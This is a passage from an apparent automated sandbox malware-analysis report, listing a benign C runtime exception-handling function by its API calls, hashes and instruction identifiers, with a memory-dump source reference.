                    • Instruction Fuzzy Hash: FA01363640015ABBCF225E84DC11EEE3F66BB19358B498415FE9D58920D336C5B2AB81
                    Function 023D7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 023D7A4B
                      • Part of subcall function 023D8140: ___BuildCatchObjectHelper.LIBCMT ref: 023D8172
                      • Part of subcall function 023D8140: ___AdjustPointer.LIBCMT ref: 023D8189
                    • _UnwindNestedFrames.LIBCMT ref: 023D7A62
                    • ___FrameUnwindToState.LIBCMT ref: 023D7A74
                    • CallCatchBlock.LIBCMT ref: 023D7A98
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                    • String ID:
                    • API String ID: 2901542994-0
                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction ID: 49b962e361d24a539bd3fdf2fe22588f709efec9ae27e2987ca394a8eaa87550
                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction Fuzzy Hash: 6101D732100109BBCF22AF55ED01EEA7BBAFF48754F158015F91866221D732E961DFA0